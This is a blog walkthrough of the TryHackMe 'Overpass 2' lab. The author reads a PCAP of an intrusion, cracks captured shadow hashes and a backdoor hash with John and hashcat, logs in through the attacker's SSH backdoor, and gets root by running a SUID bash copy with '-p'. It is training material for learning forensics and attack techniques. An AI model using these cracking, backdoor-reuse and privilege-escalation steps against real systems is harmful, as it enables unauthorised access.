Open in app

Sign in

Write

Sign in

Overpass 2 — Hacked: TryHackMe Walkthrough

Damon Taylor
6 min readDec 13, 2022

--

Introduction

Hey everyone, I’m back again here to showcase another great learning experience over at TryHackMe. This room really showcases how to analyze a PCAP file. It also shows the issues of passing credentials using outdated protocols within a PCAP. We are able to go into the PCAP and see how an attacker is doing malicious things to the webserver. We are also able to take advantage of the credentials. While using some tools, we are able to log into the machine ourselves to exploit a backdoor. Lastly this room highlights ‘elevating privileges’ on an account where we are to be able to access items we wouldn’t normally be able to do so.

Forensics — Analyze the PCAP (part1)

1.1 What was the URL of the page they used to upload a reverse shell?

Our first step of recon is to analyze our PCAP with some sort of tool. I first used a free online PCAP analyzer called A-Packets. With this tool I was able to find the URL within one of the POST requests.

1.2 What payload did the attacker use to gain access?

Within the same POST request I was able to find more information and eventually found the payload the attacker used to gain access into our machine.

1.3 What password did the attacker use to privesc?

At this point I have used up all my resources within my PCAP analyzer and had to do some manual digging. I decided to continue the rest of our recon using Wireshark. Within Wireshark I was searching for the string ‘password’ within all of the packet bytes. I was finally able to find something within packet #98.

1.4 How did the attacker establish persistence?

Our attacker wants to keep their foothold within our system so they would most likely install some sort of software. After digging within the same packet I was able to find something very interesting… a backdoor!

Our attacker downloaded a backdoor from Github, which can be used to SSH into the machine (we will show how this can be used later :)

1.5 Using the fasttrack wordlist, how many of the system passwords were crackable?

Also within this packet, there was a shadow file that was holding users, along with their hashed credentials. We want to find out how many of these user passwords can be cracked. With this in mind I figured it would be a great opportunity to utilize John The Ripper.

First we want to take all of the information at hand and save it into a text file (I named mine Password). Then we are going to use John to crack the hashes with our fasttrack wordlist. I was able to find 4 users who’s password could easily be cracked (easy money).

Research — Analyze the code (Part 2)

1.1 What’s the default hash for the backdoor?

For this next part we are going to want to download the backdoor ourselves and check it out. After downloading it, I was able to run the help command alongside the file to see if we could get any specific details on the backdoor. I was able to find the default hash this way.

2.2 What’s the hardcoded salt for the backdoor?

In order to find the hardcoded salt we are going to have to analyze the source code. We are able to do this on the GitHub website. The piece that we are specifically looking for is going to be in the main.go portion of code.

2.3 What was the hash that the attacker used?

Now we have to go back to the PCAP. Using Wireshark (within that same packet from earlier) I was able to find the hash the attacker used.

2.4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

For this next step we are going to want to create another text file containing the hash and hardcoded salt in the following format — Hash:Salt. After this we will use the tool hashcat along with our wordlist ‘rockyou’ in order to crack this hash.

After running the command I was able to crack the hash!

Attack — Get back in! (Part 3)

3.1 The attacker defaced the website. What message did they leave as a heading?

This was an easy one. We just have to visit the website itself and it gives us the message our attacker left us.

3.3 What’s the user flag?

Now it’s time to put ourselves into the shoes of the attacker. We already know there is a backdoor on the machine and we know the cracked password. Time to get Hackin! Our first step is to SSH into the machine using port 2222 (Our attacker selected this port within the PCAP).

After a successful login I went up one directory (back to /home/james) and was able to find the user flag.

3.4 What’s the root flag?

This was the hardest part but we get to learn more on escalating privileges. I first tried going into root but was unsuccessful (awe c’mon). With that being said I decided to do more digging. I went back to the original directory I was in and listed all directories (including hidden ones).

I was able to find a suid bash file. I checked the permissions on that file and guess who owns it (yes it’s owned by root). After running this command (./.suid_bash -p) I was able to run the shell as root. I was then able to go to the root directory, where I found the root flag!

Final Thoughts

This was a great room to learn how to analyze PCAP files along with showcasing your privilege escalation techniques. Overall it was a great experience and I will be back soon to do another blog! Thanks for reading :)

Tryhackme
Tryhackme Walkthrough
Tryhackme Writeup
Cybersecurity
Cyberattack

--

--

Damon Taylor

Written by Damon Taylor

1 Follower

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams